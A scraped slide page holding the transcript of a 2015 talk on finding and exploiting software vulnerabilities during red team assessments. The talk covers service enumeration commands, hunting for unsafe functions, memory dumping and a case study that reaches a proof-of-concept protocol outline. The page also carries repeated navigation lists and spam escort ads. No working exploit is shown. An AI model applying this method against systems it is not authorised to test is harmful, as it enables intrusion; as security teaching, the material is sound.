II-SDV 2015, 20 - 21 April, in NiceII-SDV 2015, 20 - 21 April, in Nice
II-SDV 2015, 20 - 21 April, in NiceDr. Haxel Consult
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFBrendan Gregg
 
Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison Roy Messinger
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningAndrew Beard
 
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...aaajjj4
 
Using Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC IssuesUsing Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC IssuesAnil Nair
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Yulia Tsisyk
 
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...Accumulo Summit
 
Examining Malware with Python
Examining Malware with PythonExamining Malware with Python
Examining Malware with Pythonmrphilroth
 
Data mining cyber security
Data mining cyber securityData mining cyber security
Data mining cyber securityAmir Razmjou
 
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...Amir Razmjou
 
Oracle Basics and Architecture
Oracle Basics and ArchitectureOracle Basics and Architecture
Oracle Basics and ArchitectureSidney Chen
 

Similar to Software vulnerability discovery and exploitation during red team assessments (20)

Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave Scope
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
 
Performance Risk Management
Performance Risk ManagementPerformance Risk Management
Performance Risk Management
 
Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail Scanner
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
OSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
 
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
 
II-SDV 2015, 20 - 21 April, in Nice
II-SDV 2015, 20 - 21 April, in NiceII-SDV 2015, 20 - 21 April, in Nice
II-SDV 2015, 20 - 21 April, in Nice
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPF
 
Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine Learning
 
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
 
Using Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC IssuesUsing Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC Issues
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
 
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
 
Examining Malware with Python
Examining Malware with PythonExamining Malware with Python
Examining Malware with Python
 
Data mining cyber security
Data mining cyber securityData mining cyber security
Data mining cyber security
 
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
 
Oracle Basics and Architecture
Oracle Basics and ArchitectureOracle Basics and Architecture
Oracle Basics and Architecture
 

Recently uploaded

SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 

Recently uploaded (20)

SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 

Software vulnerability discovery and exploitation during red team assessments

  • 1. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 SoftwareVulnerability Discovery & Exploitation During RedTeam Assessments Ryan Wincey rwincey@securifera.com 9/30/2015
  • 2. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Background • Long term red team assessments • Persistence with remote access tools • Looking for alternative means of network propagation or privilege escalation
  • 3. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Windows netstat -ano | findstr LISTEN
  • 4. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Windows tasklist /v | findstr <pid>
  • 5. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Linux netstat -anop | grep LISTEN ps -ef | grep <pid>
  • 6. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Reverse Engineering Software – IDA Pro/Hexrays – Hopper – Other • Target Binary
  • 7. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Helpful bug hunting tips – Identify areas where data is introduced from outside of the application • Command Line Parameters • Socket Reads • File Reads • Environment Variables • i.e. read, gets, fread, fgets, recv, recv_from
  • 8. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Helpful bug hunting tips – Trace those inputs to parsing functions; look for interesting functions and memory operations • strcpy, strcat • sprintf, printf • memcpy • system • any custom string or memory copies
  • 9. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Dynamic Analysis Checklist • In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment. • Tips for getting the application to run. – Zip up support files in the same directory. ( 7za, zip ) – Listdlls.exe, ldd - loaded libraries – Handle.exe, /proc/<pid> - open files – Procmon.exe – identify registry keys – Read log files – track down missing files or registry settings
  • 10. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Analyzing Process Memory • Comparing the running process environment to your test environment. • Windows procdump.exe /accepteula -ma <pid> <dump file> • Linux gdb attach <pid>
  • 11. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Crash Dumps • In the event that you crash the application and want to collect crash dumps. • Windows HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsWindows Error ReportingLocalDumps DumpFolder DumpCount DumpType CustomDumpFlags • Linux ulimit –c unlimited
  • 12. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Identify target and binary location Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
  • 13. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Identify target and binary location
  • 14. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
  • 15. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
  • 16. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
  • 17. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
  • 18. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
  • 19. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
  • 20. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Query service details in registry
  • 21. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Setup as nearly identical environment • Operating system • File system • Service registration • Debugging tools • Scripting support
  • 22. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Set breakpoint on our vulnerable function
  • 23. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Set breakpoint on our vulnerable function
  • 24. FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • POC Skeleton – Define Protocol [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ] – Choose Implementation Python, Ruby, Powershell, C – Code up boiler plate stuff / Use template Socket connect, send, recv, Formatting
